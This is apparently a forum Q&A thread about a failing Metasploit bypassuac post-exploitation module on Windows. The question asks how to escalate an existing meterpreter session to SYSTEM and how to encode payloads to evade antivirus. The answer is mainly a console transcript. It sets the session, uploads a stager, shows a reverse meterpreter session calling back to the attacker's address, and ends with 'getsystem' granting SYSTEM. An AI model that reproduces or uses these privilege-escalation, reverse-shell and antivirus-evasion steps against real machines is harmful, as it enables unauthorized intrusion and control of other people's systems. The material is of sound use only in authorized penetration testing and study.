0

post/windows/escalate/bypassuac seems to fail for me

For some reason I can't get the post exploitation module bypassuac to work. This is what I did:

  1. Opened a meterpreter session on the target machine (as the NETWORKSERVICE user)
  2. Put the session in background

  3. Tried to use the post exploitation module like this:

    use post/windows/escalate/bypassuac set SESSION 1 set LHOST 192.168.1.100 set LPORT 4444 exploit

  4. The port is not used yet so should be fine.

  5. The output is as follows:

    [-] Handler failed to bind to 192.168.1.100:4444 [] Started reverse handler on 0.0.0.0:4444 [] Starting the payload handler... [] Uploading the bypass UAC executable to the filesystem... [] Meterpreter stager executable 73802 bytes long being uploaded.. [] Uploaded the agent to the filesystem.... [] Post module execution completed

  6. Then it returns to the console and does nothing, no new session, nothing whatsoever.

I checked the following things:

  1. Uploading the executable bypassuac-x86.exe manually to the target. That worked perfectly fine.
  2. Checked whether the virusscanner's alarm bells didn't ring from the executable. They didn't

Is there a way of manually running the executable and could someone explain me how that would work to open a new meterpreter session with SYSTEM level access?

Or can I somehow encode the payload and use my custom template to evade all antivirus possibilities? I haven't found any option to encode post-exploitation modules yet.

Thanks in advance

Halvar

68616c766172
  • 9
  • 1
  • 3

1 Answers1

-2
msf exploit(handler) > use post/windows/escalate/bypassuac
msf post(bypassuac) > show options

Module options:

Name Current Setting Required Description
—- ————— ——– ———–
RHOST no Host
RPORT 4444 no Port
SESSION yes The session to run this module on.

msf post(bypassuac) > set SESSION 1
SESSION => 1
msf post(bypassuac) > exploit

[*] Started reverse handler on 192.168.1.100:4444
[*] Starting the payload handler…
[*] Uploading the bypass UAC executable to the filesystem…
[*] Meterpreter stager executable 73802 bytes long being uploaded..
[*] Uploaded the agent to the filesystem….
[*] Executing the agent with endpoint 192.168.1.100:4444 with UACBypass in effect…
[*] Post module execution completed
msf post(bypassuac) >
[*] Sending stage (749056 bytes) to 192.168.1.100
[*] Meterpreter session 2 opened (192.168.1.100:4444 -> 192.168.1.102:1565) at Thu Jan 06 12:41:13 -0500 2011
[*] Session ID 2 (192.168.1.100:4444 -> 192.168.1.102:1565) processing InitialAutoRunScript ‘migrate -f’
[*] Current server process: zuWlXDpYlOMM.exe (2640)
[*] Spawning a notepad.exe host process…
[*] Migrating into process ID 3276
[*] New server process: notepad.exe (3276)

msf post(bypassuac) > sessions -i 2
[*] Starting interaction with 2…

meterpreter > getsystem
…got system (via technique 1).
meterpreter > sysinfo
user3196630
  • 1
  • 3